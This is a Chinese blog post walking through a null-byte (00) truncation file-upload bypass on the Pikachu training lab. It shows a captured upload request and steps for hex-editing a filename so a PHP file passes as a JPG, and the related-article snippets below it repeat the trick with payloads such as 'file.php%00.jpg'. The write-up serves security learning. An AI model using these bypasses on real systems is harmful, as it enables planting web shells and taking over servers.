文件上传 00截断 (windows)

已于 2023-02-22 11:05:30 修改
阅读量728 收藏 2
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 秀秀 文章标签: php 开发语言
于 2023-02-22 11:03:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52549196/article/details/129158484
文章讲述了通过将文件名中的空格替换为00十六进制,利用Windows系统在读取文件名时遇到0x00会停止的特性,绕过安全检查,成功上传PHP文件为jpg格式,从而可能引发安全问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文件上传 00截断 (windows)

在这里插入图片描述

POST /pikachu/vul/unsafeupload/clientcheck.php HTTP/1.1
Host: xiu.com
Content-Length: 1728
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://xiu.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybF6p5412ysHQJcwA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://xiu.com/pikachu/vul/unsafeupload/clientcheck.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h0dsuqs5ik9jpt4do4seer8l6v
Connection: close

------WebKitFormBoundarybF6p5412ysHQJcwA
Content-Disposition: form-data; name="uploadfile"; filename="xiao.php

把文件名改成 php .jpg
在这里插入图片描述

正常上传 文件名是xiaoxiaohhuee.php .jpg
在这里插入图片描述

再将空格的十六进制改为00(系统在对文件名进行读取时,如果遇到0x00,就会认为读取已经结束,系统按二进制或十六进制读取文件,遇到ASCII码为0的位置就停止,而这个ASCII为0的位置在十六进制中是00);

在这里插入图片描述

在这里插入图片描述

成功上传为php
在这里插入图片描述

28-4 文件上传漏洞 - %0000截断
weixin_43263566的博客
03-19 1595
查看源码发现是白名单绕过,只允许 jpg、png、gif 格式的文件。先正常的上传一个php文件,然后使用bp抓包之后改包。改完配置后记得重启服务器使配置生效。PHP版本低于5.3.4。在php.ini中,参数需要设置为OFF。
【愚公系列】2023年04月 文件上传渗透测试之绕过白名单检查(Content-Type、%00截断、0x00截断、CVE-2015-2348)
热门推荐
时光隧道
08-22 5万+
文件上传漏洞是一种安全漏洞,指攻击者通过网站上传功能上传恶意文件来攻击网站的漏洞。攻击者可以通过利用这种漏洞上传恶意文件来执行代码和命令,进而控制网站、窃取敏感信息等。常见的文件上传漏洞主要存在于没有健全的文件上传验证机制的网站中。白名单检查是一种安全机制,用于限制只有列入特定名单中的人员、设备或程序才可以获得访问权限,而不允许其他未经授权的访问。这种机制通常用于保护敏感数据或系统不被未经授权的访问和攻击。在白名单检查中,只有列入白名单的实体允许通过验证,而不在白名单中的所有实体都被阻止访问相关资源。
文件上传 00截断
qq_69100706的博客
08-05 1590
在CTF(Capture The Flag)竞赛中,00截断(Null Byte Truncation)是一种利用Web应用程序对上传文件处理不当的技巧,尤其是在处理文件名或文件内容时。00截断依赖于某些编程语言或系统在遇到ASCII null字节(\x00)时的行为,即终止字符串解析或文件处理。
【详解】burpsuite上传截断截断原理介绍
最新发布
牛肉胡辣汤
05-13 731
在Web安全测试中,文件上传功能是一个常见的攻击点。攻击者可以通过各种手段绕过服务器的文件类型和大小限制,上传恶意文件,从而执行任意代码或导致其他安全问题。Burp Suite 是一个广泛使用的Web应用安全测试工具,它提供了强大的功能来帮助安全测试人员进行文件上传截断测试。本文将详细介绍如何使用 Burp Suite 进行文件上传截断测试,并解释其背后的原理。文件上传截断是指通过修改HTTP请求中的文件上传参数,使服务器在处理文件上传时发生错误或行为异常,从而绕过文件类型和大小限制的一种攻击手法。
文件上传-00截断
weixin_45711977的博客
07-18 2620
文件上传-00截断
文件上传漏洞,之00截断
m0_63028223的博客
06-16 1210
上传一个shell.png.jpg文件。然后在png后加一个空格方便再二进制查找位置。找到代表空格的20,我们将20改为00这个时候png后边就会存在一个看不见的字符。放包,使其上传。文件上传成功,成功绕过前端验证,修改了上传文件的类型。同样方法成功上传PHP文件。...
文件上传00截断
华丽的贵族
10-02 6528
文件上传之—00截断 1.什么是00截断 事实上0x00,%00,/00这三类阶截断都是属于同种原理,只是表示不同而已 下面是用 URL 编码形式表示的 ASCII 字符 在url中%00表示ascll码中的0 ,而ascii中0作为特殊字符保留,表示字符串结束,所以当url中出现%00时就会认为读取已结束 ...
文件上传基于GET方式的00截断绕过
xdjxi的博客
02-22 2213
实验原理 文件上传从客户端进行检测显然是防护不足的,所以需要从服务器端进行防护。服务端的检测与绕过方法有很多,常见的有: 1.后缀名检测绕过 2.MIME 类型检测与绕过 3.文件内容检测与绕过 4. 00截断绕过 5.条件竞争检测与绕过 截断漏洞出现的核心就是chr(O),这个字符不为空(Null),也不是空字符(""), 更不是空格。当程序在输出含有chr(O)变量时,chr(O)后面的数据会被停止,换句话说,就是误把它当成结束符,后面的数据直接忽略,这就导致了漏洞产生。由于Ox00是字符串的
文件上传漏洞-05】文件上传路径截断实例—以upload-labs-12为例
m0_64378913的博客
07-12 3347
目录1 知识储备2 实验简介2.1 实验目的2.2 实验环境2.3 前期准备3 文件上传路径截断实例3.1 实例一:upload-labs-113.2 实例二:upload-labs-124 总结 1 知识储备 概述:在ASCII码中,00代表的是空字符,在URL中表现为%00。在文件截断攻击中,就是采用空字符来误导服务器截断字符串,以达到绕过攻击的目的。 原理:服务器后台采用的是move_uploaded_file()函数将上传的文件移动到新位置,该函数属于文件系统函数,底层是采用C语言实现的,在C语言
文件上传绕过的多种姿势
qq_32445755的博客
04-19 739
此文件可以实现:文件夹密码保护、用户自动重定向、自定义错误页面、改变文件扩展名、封禁特定ip地址的用户、只允许特定ip地址用户、禁止目录列表,以及使用其他文件作为index文件等功能。上传黑名单以外的后缀名,在iis里asp禁止上传了,可以上传asa、cer、cdx这些后缀,如果网站允许.net执行,可以上传ashx代替aspx。#如果目录存在,我们将把它公开,这样我们就可以定义在其中运行shell所需的服务器函数#“如上所示,我们可以首先导航到属于SmarterMail服务的App_Data目录,”
文件上传漏洞,如果要使用0x00截断php文件上传到face目录下,应该在Fiddler怎么修改路径?
06-05
因此,如果要将 php 文件上传到 face 目录下,可以在 Fiddler 中将上传文件的路径修改为: ``` C%3A%5Cxampp%5Chtdocs%5Cface%5Cfile.php%00.jpg ``` 其中,`C%3A%5Cxampp%5Chtdocs%5C` 是上传文件的根路径,`face...
00截断上传绕过_关于上传中的00截断分析
weixin_39922929的博客
12-20 763
关于上传中00截断的细节,很多朋友在渗透中都会发现一些这样的有趣现象,这个站点使用00截断上传的方法上传成功了,而换一个站点又失败了,这是什么原因呢?你看了这篇文章就会明白。00截断原理0x00是字符串的结束标识符,攻击者可以利用手动添加字符串标识符的方式来将后面的内容进行截断,而后面的内容又可以帮助我们绕过检测。00截断的限制条件1PHP<5.3.29,且GPC关闭00截断的利用方法上传文...
CTFHUB-文件上传()00截断
慢就是快
04-01 922
文章目录1.题目2.初次上传尝试3.再次上传4.蚁剑链接5.查找Flag 1.题目 根据提示去百度翻阅了解了一下PHP 5.2 00截断原理 2.初次上传尝试 上传了一个shell.php%00.jpg提示上传成功,并在响应包发现源码 if (!empty($_POST['submit'])) { $name = basename($_FILES['file']['name']); $info = pathinfo($name); $ext = $info['extension
CTFHUB-文件上传-00截断
weixin_68416970的博客
08-02 366
CTFHUB技能树、文件上传漏洞、00截断的过关教程
文件上传漏洞%00截断
weixin_44087114的博客
02-20 640
前几天看某大佬的文章里提到有文件上传漏洞,自顾回忆来下,脑袋里已空空如也了,没办法,这个貌似HVV还要用到,再复盘一下吧。 诸如前端、黑白名单绕过暂且不表,下面就用%00截断试试水。首先要熟悉下函数:move_uploaded_file(file,newloc); (文件名字,新文件位置) 原理是数据包中存在 path: uploads/,那么攻击者可以通过修改path的值来构造paylod: uploads/aa.php%00 顺路BP~~SQL 中判断库站分离的技巧 select @@servernam
文件上传00截断详解
redwand的博客
02-03 2万+
00截断是操作系统层的漏洞,由于操作系统是C语言或汇编语言编写的,这两种语言在定义字符串时,都是以\0(即0x00)作为字符串的结尾。操作系统在识别字符串时,当读取到\0字符时,就认为读取到了一个字符串的结束符号。因此,我们可以通过修改数据包,插入\0字符的方式,达到字符串截断的目的。00截断通常用来绕过web软waf的白名单限制
文件上传之%00截断00截断)以及pikachu靶场
m0_74741186的博客
10-04 2489
pikachu的文件上传和upload-lab的文件上传当写日记了,最近发现关注我的都是人机,伤心了(10月4号)想着top10的漏洞原理搞清楚,给我搞三天搞完他,之前学了一点,都是吊儿郎当的,sql注入我差不多会了基础(但是得做到23关,听说这些关卡都是基础)文件上传还有白名单没会(这个也有靶场,uploads,还没下)xss有dom型不会ssrf基本不会。
网安入门12-文件上传(黑白名单,00截断
m0_61499194的博客
01-09 2263
比如发送的htp包里把文件名改成test.asp.或test.asp_(下划线为空格),这种命名方式在windows系统里是不被允许的,所以需要在burp之类里进行修改,然后绕过验证后,会被windows.系统自动去掉后面的点和空格,但要注意Unix/Linux系统没有这个特性。原因在于GET传参和POST传参不同,post数据的特点是我们把包发过去之后,服务器会进行URL二次编码,编码后的参数到了后端再解码执行,相当于传到服务器的是%25%30%30,到了后端还是%00
文件上传00截断分析
a21536545645的博客
08-12 4058
原理 php是基础c语言实现的,C语言中认为0x00是结束符号,文件上传之所以可以00截断,是因为白名单判断的时候是判断后缀,在进行路径拼接的时候用的其他值,然后在进行move_uploaded_file的时候,这个函数读取到hex值为00的字符,认为读取结束,出现00截断 例如上传图片1.png,filename为1.png,save_path为…/upload/1.php%00 我们看在代码层面会发生什么 1,取后缀名: $file_ext=png 后缀名在白名单中,符合 2,拼接上传
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

????27282

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值